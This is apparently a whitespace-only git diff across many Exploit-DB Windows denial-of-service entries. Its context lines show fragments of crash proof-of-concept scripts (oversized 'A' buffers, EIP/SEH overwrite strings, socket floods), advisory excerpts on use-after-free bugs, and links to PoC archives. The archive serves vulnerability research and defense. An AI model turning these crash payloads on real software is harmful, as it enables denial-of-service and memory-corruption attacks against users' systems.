We can see that esi has an application verifier heap chunk canary value used at the start of allocated chuncks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h] and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data leading to memory corruption. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37924.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37924.zip \ No newline at end of file diff --git a/platforms/windows/dos/37957.txt b/platforms/windows/dos/37957.txt index e42af83f4..5bca4cbe8 100755 --- a/platforms/windows/dos/37957.txt +++ b/platforms/windows/dos/37957.txt @@ -19,5 +19,4 @@ junk = "A"*66666 file = open("CRASH.gas",'w') file.write(junk) file.close() -********************************************************************************************** - +********************************************************************************************** \ No newline at end of file diff --git a/platforms/windows/dos/37966.txt b/platforms/windows/dos/37966.txt index 1419eb1ef..9dfc0aee9 100755 --- a/platforms/windows/dos/37966.txt +++ b/platforms/windows/dos/37966.txt @@ -64,5 +64,4 @@ the crashing register value (0xAAAAAAAA) is also attached (037542f7_full.doc) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37966.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37966.zip \ No newline at end of file diff --git a/platforms/windows/dos/37967.txt b/platforms/windows/dos/37967.txt index 080d384fa..1a339006a 100755 --- a/platforms/windows/dos/37967.txt +++ b/platforms/windows/dos/37967.txt @@ -61,5 +61,4 @@ file). 86ea4a3c_orig.doc (original file) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37967.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37967.zip \ No newline at end of file diff --git a/platforms/windows/dos/37980.pl b/platforms/windows/dos/37980.pl index 9825ee39a..7e13d7c02 100755 --- a/platforms/windows/dos/37980.pl +++ b/platforms/windows/dos/37980.pl @@ -750,5 +750,4 @@ open(C, ">:raw", "crafted.xls"); print C $crafted; close(C); -# http://0xffe4.org - +# http://0xffe4.org \ No newline at end of file diff --git a/platforms/windows/dos/37981.pl b/platforms/windows/dos/37981.pl index c8e5a6a29..a5d557586 100755 --- a/platforms/windows/dos/37981.pl +++ b/platforms/windows/dos/37981.pl @@ -177,4 +177,4 @@ my $poc = "\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x88\x00". open(C, ">:raw", "poc.bmp"); print C $poc; -close(C); +close(C); \ No newline at end of file diff --git a/platforms/windows/dos/37984.pl b/platforms/windows/dos/37984.pl index 7eb58253d..3ec2d1551 100755 --- a/platforms/windows/dos/37984.pl +++ b/platforms/windows/dos/37984.pl @@ -19,4 +19,4 @@ open(C, ">:raw", "poc.avi"); print $po; -close(C); +close(C); \ No newline at end of file diff --git a/platforms/windows/dos/38001.py b/platforms/windows/dos/38001.py index 25c818bdf..ff19f0543 100755 --- a/platforms/windows/dos/38001.py +++ b/platforms/windows/dos/38001.py @@ -512,4 +512,4 @@ if __name__ == '__main__': hostname = '192.168.242.128' port = 22 - exploit(hostname, port) + exploit(hostname, port) \ No newline at end of file diff --git a/platforms/windows/dos/38014.py b/platforms/windows/dos/38014.py index 7547c4d8f..8516ac7aa 100755 --- a/platforms/windows/dos/38014.py +++ b/platforms/windows/dos/38014.py @@ -478,4 +478,4 @@ if __name__ == '__main__': hostname = '192.168.242.128' port = 22 - exploit(hostname, port) + exploit(hostname, port) \ No newline at end of file diff --git a/platforms/windows/dos/38031.pl b/platforms/windows/dos/38031.pl index 52f1e924d..bf3f9f0d6 100755 --- a/platforms/windows/dos/38031.pl +++ b/platforms/windows/dos/38031.pl @@ -38,4 +38,4 @@ $buffer="$buffer\\x30"; # 4212 X "0" $buffer=$buffer."\x31\x31\x31\x31\x31\x31\x31\x31\x0a\x7d\x7d\x7d"; # EOF = }}} print FILE $buffer; -close FILE; +close FILE; \ No newline at end of file diff --git a/platforms/windows/dos/38052.py b/platforms/windows/dos/38052.py index bb073ec1d..efc5c8eb2 100755 --- a/platforms/windows/dos/38052.py +++ b/platforms/windows/dos/38052.py @@ -19,4 +19,4 @@ s.send(badthing+'\r\n') s.send(badthing+'\r\n') s.send('\r\n') s.send('EXIT\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/38053.txt b/platforms/windows/dos/38053.txt index 4be489ae2..2eec9c048 100755 --- a/platforms/windows/dos/38053.txt +++ b/platforms/windows/dos/38053.txt @@ -17,5 +17,4 @@ junk = "A"*66666 file = open("CRASH.m3u",'w') file.write(junk) file.close() -********************************************************************************************** - +********************************************************************************************** \ No newline at end of file diff --git a/platforms/windows/dos/38054.txt b/platforms/windows/dos/38054.txt index a816642e8..787731caf 100755 --- a/platforms/windows/dos/38054.txt +++ b/platforms/windows/dos/38054.txt @@ -430,4 +430,4 @@ https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Poli -cy.v1.0.txt +cy.v1.0.txt \ No newline at end of file diff --git a/platforms/windows/dos/38055.txt b/platforms/windows/dos/38055.txt index f1f598555..b9924bc5f 100755 --- a/platforms/windows/dos/38055.txt +++ b/platforms/windows/dos/38055.txt @@ -157,4 +157,4 @@ tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: -https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \ No newline at end of file diff --git a/platforms/windows/dos/38072.py b/platforms/windows/dos/38072.py index db5cf8177..86c3fc02e 100755 --- a/platforms/windows/dos/38072.py +++ b/platforms/windows/dos/38072.py @@ -13,4 +13,4 @@ exploit = "A" * 1000 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target,21)) s.send("USER "+exploit+"\r\n") -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/38177.txt b/platforms/windows/dos/38177.txt index 443a8d9de..9a4056bce 100755 --- a/platforms/windows/dos/38177.txt +++ b/platforms/windows/dos/38177.txt @@ -140,4 +140,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/dos/3819.py b/platforms/windows/dos/3819.py index 26974e190..f45eba83d 100755 --- a/platforms/windows/dos/3819.py +++ b/platforms/windows/dos/3819.py @@ -122,4 +122,4 @@ n00b_file.write(Tail_Header) n00b_file.close() print"File was created." -# milw0rm.com [2007-04-30] +# milw0rm.com [2007-04-30] \ No newline at end of file diff --git a/platforms/windows/dos/38214.txt b/platforms/windows/dos/38214.txt index acad05367..9d1aa84e9 100755 --- a/platforms/windows/dos/38214.txt +++ b/platforms/windows/dos/38214.txt @@ -52,5 +52,4 @@ In this crash esi is a heap address. We can see that this is a free chunk: This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38214.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38214.zip \ No newline at end of file diff --git a/platforms/windows/dos/38215.txt b/platforms/windows/dos/38215.txt index 404454822..0a21d6dba 100755 --- a/platforms/windows/dos/38215.txt +++ b/platforms/windows/dos/38215.txt @@ -72,5 +72,4 @@ We can see that esi is holding a pointer to invalid memory. This is a heap addre Esi is a free-ed allocation. This is a use after free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38215.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38215.zip \ No newline at end of file diff --git a/platforms/windows/dos/38216.txt b/platforms/windows/dos/38216.txt index 466ea7055..e0fe5fa03 100755 --- a/platforms/windows/dos/38216.txt +++ b/platforms/windows/dos/38216.txt @@ -76,5 +76,4 @@ We can see here that eax is being indexed at an offset of 0x3f0. However, if we This poc behaves like a type confusion or memory corruption issue in areas not protected by application verifier. The fact the eip was corrupted indicates a high likelihood for exploitation. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38216.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38216.zip \ No newline at end of file diff --git a/platforms/windows/dos/38217.txt b/platforms/windows/dos/38217.txt index c75b6a516..0dfcdbd70 100755 --- a/platforms/windows/dos/38217.txt +++ b/platforms/windows/dos/38217.txt @@ -76,5 +76,4 @@ With this PoC edi=0x0000666e and edx=0x00013350. The edx value is calculated ear There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0 we can set the edi value to be 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60) which leads to an out of bound write instead of an out of bound read later in the code. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38217.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38217.zip \ No newline at end of file diff --git a/platforms/windows/dos/38225.txt b/platforms/windows/dos/38225.txt index 346af4487..e4005289c 100755 --- a/platforms/windows/dos/38225.txt +++ b/platforms/windows/dos/38225.txt @@ -245,7 +245,4 @@ tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: -https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt - - - +https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \ No newline at end of file diff --git a/platforms/windows/dos/38259.py b/platforms/windows/dos/38259.py index a8e4bb861..b0dd72d74 100755 --- a/platforms/windows/dos/38259.py +++ b/platforms/windows/dos/38259.py @@ -15,4 +15,4 @@ file = open('MASM_crash.txt' , 'w'); buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500 file.write(buffer); -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/3826.html b/platforms/windows/dos/3826.html index 23a68bdea..667a4fefa 100755 --- a/platforms/windows/dos/3826.html +++ b/platforms/windows/dos/3826.html @@ -60,4 +60,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-01] +# milw0rm.com [2007-05-01] \ No newline at end of file diff --git a/platforms/windows/dos/38272.txt b/platforms/windows/dos/38272.txt index f63fc1125..ea5214c09 100755 --- a/platforms/windows/dos/38272.txt +++ b/platforms/windows/dos/38272.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=304 Creating a device context with the flag (DCX_NORESETATTRS​) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples). Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38272.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38272.zip \ No newline at end of file diff --git a/platforms/windows/dos/38281.txt b/platforms/windows/dos/38281.txt index 31f284f0f..bc6bc95fb 100755 --- a/platforms/windows/dos/38281.txt +++ b/platforms/windows/dos/38281.txt @@ -67,4 +67,4 @@ That is from the input file: 0001e60: 8933 0800 2b2f 4f5a 0040 1909 6edf cf11 .3..+/OZ.@..n... Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38281.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38281.zip \ No newline at end of file diff --git a/platforms/windows/dos/38282.txt b/platforms/windows/dos/38282.txt index a230942fe..ecedea234 100755 --- a/platforms/windows/dos/38282.txt +++ b/platforms/windows/dos/38282.txt @@ -69,5 +69,4 @@ do { That's a bug, because if index < SIZEOF_JMP, it will wrap and never exit. I would think it should decrement by 1 not sizeof(jmp) anyway, because jmps do not have to be aligned, but I don't know anything about ExeCryptor - maybe it makes sense. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38282.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38282.zip \ No newline at end of file diff --git a/platforms/windows/dos/38283.txt b/platforms/windows/dos/38283.txt index 7a03abf30..fd4c44350 100755 --- a/platforms/windows/dos/38283.txt +++ b/platforms/windows/dos/38283.txt @@ -50,5 +50,4 @@ Evaluate expression: -2147483646 Which is less than 0x3f1, the size parameter. Those values are directly from the executable being scanned. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38283.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38283.zip \ No newline at end of file diff --git a/platforms/windows/dos/38284.txt b/platforms/windows/dos/38284.txt index 84d8d3666..a57f37120 100755 --- a/platforms/windows/dos/38284.txt +++ b/platforms/windows/dos/38284.txt @@ -39,5 +39,4 @@ cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38284.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38284.zip \ No newline at end of file diff --git a/platforms/windows/dos/38285.txt b/platforms/windows/dos/38285.txt index 49faf9e5b..cf9426f70 100755 --- a/platforms/windows/dos/38285.txt +++ b/platforms/windows/dos/38285.txt @@ -57,5 +57,4 @@ The input pointer is corrupt because the loop overwrites the src pointer with at It seems likely /GS would have made this unexploitable. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38285.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38285.zip \ No newline at end of file diff --git a/platforms/windows/dos/38286.txt b/platforms/windows/dos/38286.txt index 67cad7284..50e916572 100755 --- a/platforms/windows/dos/38286.txt +++ b/platforms/windows/dos/38286.txt @@ -29,5 +29,4 @@ D8 01 00 80 38 00 00 80 EE 01 00 80 78 00 00 80 The bug is that the index is not verified, resulting in an arbitrary write. This is obviously exploitable for arbitrary code execution. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38286.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38286.zip \ No newline at end of file diff --git a/platforms/windows/dos/38288.txt b/platforms/windows/dos/38288.txt index e2904e185..574111a04 100755 --- a/platforms/windows/dos/38288.txt +++ b/platforms/windows/dos/38288.txt @@ -44,5 +44,4 @@ B0 4D 5B 5C A8 19 09 FE 36 1A B6 92 3A 92 96 78 Directly from the input file, so this is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38288.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38288.zip \ No newline at end of file diff --git a/platforms/windows/dos/3830.html b/platforms/windows/dos/3830.html index 2a4fb8170..df968305c 100755 --- a/platforms/windows/dos/3830.html +++ b/platforms/windows/dos/3830.html @@ -58,4 +58,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-02] +# milw0rm.com [2007-05-02] \ No newline at end of file diff --git a/platforms/windows/dos/38336.py b/platforms/windows/dos/38336.py index 66ac4caa6..3bdae04e4 100755 --- a/platforms/windows/dos/38336.py +++ b/platforms/windows/dos/38336.py @@ -144,4 +144,4 @@ Permission is hereby granted for the redistribution of this advisory, provided t The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx -''' +''' \ No newline at end of file diff --git a/platforms/windows/dos/38344.txt b/platforms/windows/dos/38344.txt index 0461b9b66..5c91fc826 100755 --- a/platforms/windows/dos/38344.txt +++ b/platforms/windows/dos/38344.txt @@ -36,5 +36,4 @@ Initiative. Code: https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38344.zip \ No newline at end of file diff --git a/platforms/windows/dos/38348.txt b/platforms/windows/dos/38348.txt index bf49fa00a..b23f33c3b 100755 --- a/platforms/windows/dos/38348.txt +++ b/platforms/windows/dos/38348.txt @@ -27,4 +27,4 @@ I’ve provided a simple example which allocates a 16k UInt vector. Using a debu The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10” Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38348.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38348.zip \ No newline at end of file diff --git a/platforms/windows/dos/3836.html b/platforms/windows/dos/3836.html index 8a040019b..a49eea479 100755 --- a/platforms/windows/dos/3836.html +++ b/platforms/windows/dos/3836.html @@ -72,4 +72,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-03] +# milw0rm.com [2007-05-03] \ No newline at end of file diff --git a/platforms/windows/dos/38405.py b/platforms/windows/dos/38405.py index b4d8e32ef..f159359f6 100755 --- a/platforms/windows/dos/38405.py +++ b/platforms/windows/dos/38405.py @@ -25,4 +25,4 @@ file.close() ''' > Vendor Notified, Fixed in latest Release. ********************************************************************************************** -''' +''' \ No newline at end of file diff --git a/platforms/windows/dos/38419.txt b/platforms/windows/dos/38419.txt index 6593e35a1..a039deb9e 100755 --- a/platforms/windows/dos/38419.txt +++ b/platforms/windows/dos/38419.txt @@ -77,4 +77,4 @@ TCPShutdown(); exit; EndIf EndFunc; ==>downit($ip,$port,$x) -#cs +#cs \ No newline at end of file diff --git a/platforms/windows/dos/3845.html b/platforms/windows/dos/3845.html index cad573208..3e09c8b1b 100755 --- a/platforms/windows/dos/3845.html +++ b/platforms/windows/dos/3845.html @@ -57,4 +57,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/windows/dos/38485.py b/platforms/windows/dos/38485.py index 08581eb96..8827a6548 100755 --- a/platforms/windows/dos/38485.py +++ b/platforms/windows/dos/38485.py @@ -39,4 +39,4 @@ audiofile.tag.artist = value audiofile.tag.album = u'andrea' audiofile.tag.album_artist = u'sindoni' -audiofile.tag.save() +audiofile.tag.save() \ No newline at end of file diff --git a/platforms/windows/dos/38498.py b/platforms/windows/dos/38498.py index 55283b2d4..3fd7ff662 100755 --- a/platforms/windows/dos/38498.py +++ b/platforms/windows/dos/38498.py @@ -30,4 +30,4 @@ buffer+="\x44" * 25000 textfile = open(filename , 'w') textfile.write(head+buffer) -textfile.close() +textfile.close() \ No newline at end of file diff --git a/platforms/windows/dos/385.c b/platforms/windows/dos/385.c index 0e17ccb9c..c4e92c125 100755 --- a/platforms/windows/dos/385.c +++ b/platforms/windows/dos/385.c @@ -204,4 +204,4 @@ sizeof(addr)) == -1) exit(0); } -// milw0rm.com [2004-08-08] +// milw0rm.com [2004-08-08] \ No newline at end of file diff --git a/platforms/windows/dos/38580.txt b/platforms/windows/dos/38580.txt index 446e46a66..bfc4d06ab 100755 --- a/platforms/windows/dos/38580.txt +++ b/platforms/windows/dos/38580.txt @@ -44,4 +44,4 @@ Observed Result: The reference cycle is created and the user can reopen the process. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38580.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38580.zip \ No newline at end of file diff --git a/platforms/windows/dos/38650.py b/platforms/windows/dos/38650.py index 7f5dc4941..1d63b8f24 100755 --- a/platforms/windows/dos/38650.py +++ b/platforms/windows/dos/38650.py @@ -22,4 +22,4 @@ buffer = "\x41" * 260 f = open ("qvr_client_5.1.txt", "w") f.write(buffer) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/3866.html b/platforms/windows/dos/3866.html index f7eddca93..a4f079dad 100755 --- a/platforms/windows/dos/3866.html +++ b/platforms/windows/dos/3866.html @@ -68,4 +68,4 @@ be possible... but I leave to posterity the hardest part of work :)</font color> To be continued...</span></span> </code></pre> -# milw0rm.com [2007-05-07] +# milw0rm.com [2007-05-07] \ No newline at end of file diff --git a/platforms/windows/dos/38701.txt b/platforms/windows/dos/38701.txt index e3c50e725..7afb2a12c 100755 --- a/platforms/windows/dos/38701.txt +++ b/platforms/windows/dos/38701.txt @@ -47,5 +47,4 @@ PoC: - http://zeroscience.mk/codes/sg2fbd-5276.zip -- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38701.zip - +- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38701.zip \ No newline at end of file diff --git a/platforms/windows/dos/38702.txt b/platforms/windows/dos/38702.txt index 0c9d37ebb..3038eb842 100755 --- a/platforms/windows/dos/38702.txt +++ b/platforms/windows/dos/38702.txt @@ -44,5 +44,4 @@ PoC: - http://zeroscience.mk/codes/tp3tpc-5277.zip -- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38702.zip - +- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38702.zip \ No newline at end of file diff --git a/platforms/windows/dos/38703.txt b/platforms/windows/dos/38703.txt index 4699cd0cc..7ab938d58 100755 --- a/platforms/windows/dos/38703.txt +++ b/platforms/windows/dos/38703.txt @@ -45,4 +45,4 @@ PoC: - http://zeroscience.mk/codes/aptpc-5278.zip -- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38703.zip +- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38703.zip \ No newline at end of file diff --git a/platforms/windows/dos/38705.py b/platforms/windows/dos/38705.py index a22169d6d..24b6b1a40 100755 --- a/platforms/windows/dos/38705.py +++ b/platforms/windows/dos/38705.py @@ -32,4 +32,4 @@ f = open("sam_spade_browse_url.txt", "w") Junk = "A"* 496 eip_overwrite = "\xaf\xbe\xad\xde" f.write(Junk+eip_overwrite) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/38710.py b/platforms/windows/dos/38710.py index a3eab4539..e1edac8a9 100755 --- a/platforms/windows/dos/38710.py +++ b/platforms/windows/dos/38710.py @@ -24,4 +24,4 @@ file.close() file = open('Local_Crash_PoC.m3u8', 'wb') file.write(m3u8) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/38711.py b/platforms/windows/dos/38711.py index ba207ff7f..1ea6663b7 100755 --- a/platforms/windows/dos/38711.py +++ b/platforms/windows/dos/38711.py @@ -37,4 +37,4 @@ file.close() file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />') file = open('Local_Crash_PoC.asx','w') file.write(file_new_data) -file.close() +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/38713.txt b/platforms/windows/dos/38713.txt index e706a53d8..67f738daa 100755 --- a/platforms/windows/dos/38713.txt +++ b/platforms/windows/dos/38713.txt @@ -84,4 +84,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38713.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38713.zip \ No newline at end of file diff --git a/platforms/windows/dos/38714.txt b/platforms/windows/dos/38714.txt index f52928071..738cba455 100755 --- a/platforms/windows/dos/38714.txt +++ b/platforms/windows/dos/38714.txt @@ -81,4 +81,4 @@ The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce wi Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38714.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38714.zip \ No newline at end of file diff --git a/platforms/windows/dos/3873.html b/platforms/windows/dos/3873.html index 863626e0d..5ad8ce041 100755 --- a/platforms/windows/dos/3873.html +++ b/platforms/windows/dos/3873.html @@ -14,4 +14,4 @@ </script> </html> -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/windows/dos/38734.txt b/platforms/windows/dos/38734.txt index 86d0c9566..2987334e2 100755 --- a/platforms/windows/dos/38734.txt +++ b/platforms/windows/dos/38734.txt @@ -34,4 +34,4 @@ Then test start a server like this: $ openssl s_server -key key.pem -cert cert.pem -accept 8080 -And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file. +And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file. \ No newline at end of file diff --git a/platforms/windows/dos/38735.txt b/platforms/windows/dos/38735.txt index 46f0c7e84..27961ca20 100755 --- a/platforms/windows/dos/38735.txt +++ b/platforms/windows/dos/38735.txt @@ -35,5 +35,4 @@ avengine_dll!ekaGetObjectFactory+0x51537: This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38735.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38735.zip \ No newline at end of file diff --git a/platforms/windows/dos/38736.txt b/platforms/windows/dos/38736.txt index be0f9e55d..53b93e7d0 100755 --- a/platforms/windows/dos/38736.txt +++ b/platforms/windows/dos/38736.txt @@ -99,5 +99,4 @@ Entry User Heap Segment Size PrevSize Unused Flags # So looks like an exploitable use after free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38736.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38736.zip \ No newline at end of file diff --git a/platforms/windows/dos/38747.py b/platforms/windows/dos/38747.py index f3154823b..1df0881c8 100755 --- a/platforms/windows/dos/38747.py +++ b/platforms/windows/dos/38747.py @@ -42,4 +42,4 @@ print "Building graph" sess.connect(s_get("HTTP")) print "Starting fuzzing now" -sess.fuzz() +sess.fuzz() \ No newline at end of file diff --git a/platforms/windows/dos/38758.py b/platforms/windows/dos/38758.py index e91e724ce..520b7c038 100755 --- a/platforms/windows/dos/38758.py +++ b/platforms/windows/dos/38758.py @@ -22,4 +22,4 @@ eip = "\x42" * 4 f = open ("super_scan_4.1.txt", "w") f.write(buffer + eip) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/38759.py b/platforms/windows/dos/38759.py index 4f79d249d..273f1f053 100755 --- a/platforms/windows/dos/38759.py +++ b/platforms/windows/dos/38759.py @@ -22,4 +22,4 @@ eip = "\x42" * 4 f = open ("super_scan_4.1_tools.txt", "w") f.write(buffer + eip) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/38760.py b/platforms/windows/dos/38760.py index d371def74..43692e729 100755 --- a/platforms/windows/dos/38760.py +++ b/platforms/windows/dos/38760.py @@ -50,4 +50,4 @@ seh = "\x43" * 4 f = open ("super_scan_4.1_windows_enumeration.txt", "w") f.write(buffer + nseh + seh) -f.close() +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/38761.py b/platforms/windows/dos/38761.py index 58f5307c3..56dace34e 100755 --- a/platforms/windows/dos/38761.py +++ b/platforms/windows/dos/38761.py @@ -19,4 +19,4 @@ file.close() # Follow on twitter @vik.create - + \ No newline at end of file diff --git a/platforms/windows/dos/38771.py b/platforms/windows/dos/38771.py index 06e55218a..65ebd0058 100755 --- a/platforms/windows/dos/38771.py +++ b/platforms/windows/dos/38771.py @@ -17,4 +17,4 @@ MESSAGE = "\x41" * 50000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) s.send(MESSAGE) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/38787.txt b/platforms/windows/dos/38787.txt index 72242bcee..dc7a215ad 100755 --- a/platforms/windows/dos/38787.txt +++ b/platforms/windows/dos/38787.txt @@ -64,4 +64,4 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary http://protekresearchlab.com/exploits/COSIG-2015-001.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38787.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/38788.txt b/platforms/windows/dos/38788.txt index 69fb11c03..a746d42f2 100755 --- a/platforms/windows/dos/38788.txt +++ b/platforms/windows/dos/38788.txt @@ -60,4 +60,4 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary http://protekresearchlab.com/exploits/COSIG-2015-002.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38788.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/38789.txt b/platforms/windows/dos/38789.txt index 639ecb8c6..cb71c6f4b 100755 --- a/platforms/windows/dos/38789.txt +++ b/platforms/windows/dos/38789.txt @@ -60,4 +60,4 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary http://protekresearchlab.com/exploits/COSIG-2015-003.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38789.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/38793.txt b/platforms/windows/dos/38793.txt index 25f66bec2..3a481f959 100755 --- a/platforms/windows/dos/38793.txt +++ b/platforms/windows/dos/38793.txt @@ -4,5 +4,4 @@ The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in --- Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38793.zip - 